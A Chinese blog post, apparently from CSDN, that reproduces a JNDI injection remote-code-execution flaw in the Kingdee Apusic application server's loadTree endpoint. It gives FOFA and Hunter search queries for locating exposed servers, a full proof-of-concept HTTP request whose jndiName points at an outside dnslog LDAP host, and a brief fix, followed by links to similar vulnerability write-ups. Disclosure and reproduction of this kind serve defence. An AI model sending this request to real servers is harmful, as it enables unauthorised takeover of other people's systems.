金蝶Apusic应用服务器 JNDI注入远程代码执行漏洞

最新推荐文章于 2024-04-09 17:47:34 发布
最新推荐文章于 2024-04-09 17:47:34 发布
阅读量1.9k 收藏 9
点赞数 8
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135180402
版权
本文报道了金蝶Apusic应用服务器的一个安全漏洞,loadTree接口存在jndi注入风险,攻击者可借此获取服务器权限。影响版本为V9.0SP7及以下,通过POC展示了漏洞利用方法。建议对未授权用户限制访问此接口,强调了安全责任的重要性。
摘要由CSDN通过智能技术生成

文章目录

产品简介

金蝶Apusic应用服务器(Apusic Application Server,AAS)是一款标准、安全、高效、集成并具丰富功能的企业级应用服务器软件,全面支持JakartaEE8/9的技术规范,提供满足该规范的Web容器、EJB容器以及WebService容器等,支持Websocket1.1、Servlet4.0、HTTP2.0等最新的技术规范,为企业级应用的便捷开发、灵活部署、可靠运行、高效管控以及快速集成等提供关键支撑。

漏洞概述

金蝶Apusic应用服务器 loadTree 接口存在jndi注入,攻击者可通过jndi注入远程加载代码获取服务器权限。

影响版本

V9.0 SP7及以下版本

指纹识别

fofa:

app="Apusic应用服务器"

hunter:

app.name="Apusic 金蝶天燕 Server"

漏洞利用

poc:

POST /appmonitor/protect/jndi/loadTree HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Cookie: EASSESSIONID=141476053; NAPRoutID=141476053; sl-session=V1nreK33g2WZuswc79lAOQ==
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
SL-CE-SUID: 73


jndiName=ldap://e4z2e9pm.dnslog.pw

在这里插入图片描述
访问dnslog
在这里插入图片描述

修复建议

未授权用户禁止访问该接口

【每做一件坏事都必须付出代价,无论大小。若是有苦衷有原因就能干坏事,那理由越是冠冕堂皇,坏事就能干得越发没底线。】

3tefanie丶zhou
关注
专栏目录
金蝶Apusic应用服务器 loadTree JNDI注入漏洞复现(QVD-2023-48297)
0xSec
12-22 2641
由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向loadTree接口执行JNDI注入,造成远程代码执行漏洞。利用该漏洞需低版本JDK。(漏洞比较旧,8月份补丁已出,金蝶EAS也存在类似漏洞,只是路径不一样)
金蝶Apusic应用服务器 createDataSource JNDI注入漏洞(QVD-2023-48476)
0xSec
04-04 696
由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向createDataSource接口执行JNDI注入,造成远程代码执行。利用该漏洞需低版本JDK且需要服务器上有数据库驱动。
金蝶Apusic V10 应用服务器用户管理手册
12-21
本快速入门指南介绍了金蝶 Apusic 应用服务器软件(简称 AAS)V10 产品安装、启动、 卸载、管理与使用等基本操作,为用户快速使用本产品提供指导。 金蝶 Apusic 应用服务器为复杂应用提供了一个简便、快速的开发和运行平台,对于分 布式的企业级应用,提供了易扩展、可伸缩和高安全性等特性。下面将介绍 Apusic 应用服 务器的体系结构及其提供的服务和功能,从而展示 Apusic 应用服务器对开发大型应用系统 的支持能力。
金蝶Apusic应用服务器 loadTree JNDI注入漏洞
Keepb1ue的博客
01-05 2578
金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入远程加载恶意类,造成远程代码执行
Apusic Application Server1.0中jsp源代码泄漏漏洞
java专栏
05-22 1249
google_ad_client = "pub-8800625213955058";/* 336x280, 创建于 07-11-21 */google_ad_slot = "0989131976";google_ad_width = 336;google_ad_height = 280;//<script type="text/java
金蝶Apusic应用服务器 任意文件上传漏洞复现
0xSec
11-27 2403
金蝶Apusic应用服务器deployApp接口存在任意文件上传漏洞,攻击者可通过双斜杠绕过鉴权并上传恶意压缩包接管服务器权限。
漏洞复现】金蝶Apusic应用服务器loadTree JNDI注入漏洞
weixin_45530380的博客
01-03 768
代码】【漏洞复现】金蝶Apusic应用服务器loadTree JNDI注入漏洞
金蝶Apusic应用服务器 V10企业版 用户手册+技术白皮书+调优手册
11-17
金蝶Apusic应用服务器V10企业版是金蝶公司推出的一款强大且高效的企业级中间件产品,主要用于构建和运行企业级的Web应用程序和服务。该版本的用户手册、技术白皮书以及调优手册提供了全面的技术指导和优化策略,帮助...
漏洞复现】金蝶 EAS createdatasource jndi 远程代码执行漏洞
qq_67810151的博客
04-03 309
金蝶 EAS 存在JNDI注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,导致服务器被控制。
Goby 漏洞发布| 金蝶 EAS createDataSource 路径 jndiName 参数远程代码执行漏洞
m0_46699477的博客
12-22 520
金蝶 EAS Cloud 融合了金蝶苍穹的 gPaaS 功能,是基于云原生架构的平台产品,可以进行容器化部署,具备一切云原生的架构特性,是一款拥有最先进底层架构的平台产品。金蝶 EAS Cloud 存在 jndi 注入漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
Apusic应用服务器6.0使用手册(CHM格式)
10-08
金蝶Apusic应用服务器6.0是一款标准、安全、高效、集成并且具有丰富功能的企业级应用服务器(Enterprise Application Server),它用于实现基于SOA的企业应用和服务,为企业应用和服务提供坚不可摧的基础架构支撑。金蝶Apusic应用服务器6.0在5.0的基础上进行了大量扩充和优化,在产品功能、性能、安全性、扩展性及兼容性等方面得到显著提升。金蝶Apusic应用服务器6.0大大简化了创建和管理Java EE应用的任务,并为之提供了可伸缩、高性能、高可用的运行环境。 1.1. 关于本发行说明 本发行说明包含金蝶Apusic应用服务器6.0发行时的重要信息,主要包括新增加的功能、改进或增强的功能、已处理和解决的问题等。开始使用金蝶Apusic应用服务器6.0之前,请先阅读本文档。
金蝶应用服务器的安装部署
03-24
NULL 博文链接:https://javawjy.iteye.com/blog/1076300
金蝶Apusic应用服务器 未授权目录遍历漏洞复现
0xSec
04-05 1078
由于金蝶Apusic应用服务器/admin/protected/selector/server_file/files、/admin/protected/selector/server_file/folders 等接口没有进行校验和过滤,直接将参数拼接到文件操作中,导致出现目录遍历漏洞,未经身份验证的远程攻击者可通过此漏洞读取系统内部系统文件路径及信息,导致信息泄露,系统处于极不安全状态。
Apusic Application Server技术白皮书 (转)
circularr9834的博客
08-12 203
Apusic Application Server技术白皮书 (转)[@more@]什么是应用服务器? 所有的企业级应用系统必须构建在一个完整的系统框架中,这个系统框架提供企业级计算所必须的五项关键技术: 交易完整性 ...
金蝶Apusic应用服务器 loadTree JNDI注入漏洞_apusic补丁(1)
最新发布
2301_76268112的博客
04-09 616
金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入远程加载恶意类,造成远程代码执行
AntDB数据库携手金蝶Apusic应用服务器, 共促信创产业繁荣发展
weixin_44518445的博客
11-28 994
通过双方的优势互补,为用户提供更全面、高效、安全的数智化办公环境。金蝶Apusic应用服务器Apusic Application Server,AAS)是一款标准、安全、高效、集成并具丰富功能的企业级应用服务器软件,全面支持JakartaEE8/9的技术规范,提供满足该规范的Web容器、EJB容器以及WebService容器等,支持Websocket1.1、Servlet4.0、HTTP2.0等最新的技术规范,为企业级应用的便捷开发、灵活部署、可靠运行、高效管控以及快速集成等提供关键支撑。
Goby 漏洞发布| Apusic 应用服务器 createDataSource 远程代码执行漏洞
m0_46699477的博客
12-20 665
金蝶 Apusic 应用服务器Apusic Application Server,AAS)是一款标准、安全、高效、集成并具丰富功能的企业级应用服务器软件,全面支持 JakartaEE 8/9的技术规范,提供满足该规范的 Web 容器、 EJB 容器以及 WebService 容器等,支持 Websocket 1.1、Servlet4.0、HTTP 2.0等最新的技术规范,为企业级应用的便捷开发、灵活部署、可靠运行、高效管控以及快速集成等提供关键支撑。
金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
12-02 707
金蝶Apusic应用服务器 deployApp 接口存在任意文件上传漏洞,击者可通过双斜杠绕过鉴权并上传恶意压缩包到服务器,导致远程代码执行,危及服务器安全,接管服务器权限。
Goby 漏洞发布| Apusic 应用服务器 loadTree 远程代码执行漏洞
m0_46699477的博客
12-20 466
金蝶 Apusic 应用服务器Apusic Application Server,AAS)是一款标准、安全、高效、集成并具丰富功能的企业级应用服务器软件,全面支持 JakartaEE 8/9的技术规范,提供满足该规范的 Web 容器、 EJB 容器以及 WebService 容器等,支持 Websocket 1.1、Servlet4.0、HTTP 2.0等最新的技术规范,为企业级应用的便捷开发、灵活部署、可靠运行、高效管控以及快速集成等提供关键支撑。
金蝶 apusic 应用服务器存在一个任意文件上传漏洞
12-21
金蝶apusic应用服务器存在一个任意文件上传漏洞,这意味着攻击者可以利用该漏洞向服务器上传恶意文件,从而可能导致服务器遭受各种安全攻击。攻击者可以利用这样的漏洞来上传包含恶意代码的文件,然后通过执行这些恶意代码来获取服务器的控制权,或者窃取服务器上的敏感信息。 为了解决这一漏洞金蝶公司应当立即发布安全补丁程序,修复apusic应用服务器中的漏洞,并提醒用户及时更新。另外,用户也应当及时关注漏洞的公告信息,保持应用服务器和相关软件的更新,以减少被攻击的风险。 此外,金蝶公司还应当提升其应用服务器安全性标准,加强对文件上传的验证和过滤机制,限制上传文件的类型和大小,确保用户只能上传安全的文件。同时,还应当加强应用服务器的访问控制和权限管控,以防止不明身份的用户对服务器进行上传操作。 最后,金蝶公司还应当加强安全意识教育,提高用户对安全漏洞的认识和预防意识,引导用户在使用应用服务器时注意安全问题,避免因为一时的疏忽而导致安全风险的产生。只有公司和用户双方共同努力,才能最大程度地保障应用服务器安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值